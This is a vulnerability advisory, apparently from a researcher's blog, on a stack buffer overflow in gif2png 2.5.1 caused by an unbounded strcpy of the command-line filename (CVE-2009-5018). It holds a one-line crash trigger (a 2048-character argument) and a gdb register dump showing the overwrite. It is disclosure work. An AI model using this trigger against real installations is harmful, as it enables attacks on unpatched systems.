MENU

Patroklos Argyroudis

gif2png command line buffer overflow

  • ,cgi,research,vulnerability
  • advisories,
  • buffer
  • overflow

A stack‑based buffer overflow in gif2png (versions 2.5.1 and earlier) allows attackers to overwrite memory by supplying an overly long filename on the command line. Because the program uses an unsafe strcpy() into a fixed‑size buffer, crafted input can cause a crash or potentially enable remote code execution when gif2png is invoked by other software—such as CGI scripts—that pass user‑controlled filenames. Tracked as CVE‑2009‑5018, this flaw highlights the risk of unbounded command‑line parsing in helper utilities.

We have discovered an "improper input validation" vulnerability in the gif2png utility that leads to a stack buffer overflow.

Details

gif2png is a utility that converts files from the Graphic Interchange Format (GIF) to Portable Network Graphics (PNG).

gif2png (up to and including version 2.5.1) is prone to a command line buffer overflow since there is an strcpy(3) call that fails to bounds-check user-supplied data before copying them to a fixed size buffer. Here is a transcript of triggering the bug:

[argp@hegel /tmp]$ gif2png `python -c 'print "A"*2048'`
Segmentation fault (core dumped)
[argp@hegel /tmp]$ gdb -q gif2png -c core
(no debugging symbols found)

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /usr/lib/libpng12.so.0...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libpng12.so.0
Reading symbols from /lib/i686/cmov/libm.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libm.so.6
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
(no debugging symbols found)
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0xb7e6c6ed in ?? () from /lib/i686/cmov/libc.so.6
gdb $ i r
eax            0x41414141   0x41414141
ecx            0xb7f5960c   0xb7f5960c
edx            0xbfffe960   0xbfffe960
ebx            0xb7f57ff4   0xb7f57ff4
esp            0xbfffe384   0xbfffe384
ebp            0xbfffe3d8   0xbfffe3d8
esi            0xb7f3b1da   0xb7f3b1da
edi            0xb7f3b1e4   0xb7f3b1e4
eip            0xb7e6c6ed   0xb7e6c6ed
eflags         0x10206  [ PF IF RF ]
cs             0x73 0x73
ss             0x7b 0x7b
ds             0x7b 0x7b
es             0x7b 0x7b
fs             0x0  0x0
gs             0x33 0x33

The bug is located at file gif2png.c, line number 901, strcpy(name, argv[i]), where name is a fixed size char array.

This may have security repercussions if gif2png is configured as a handler for other applications that can pass user-supplied filenames as command line input to gif2png (e.g. from a CGI or other).

Read more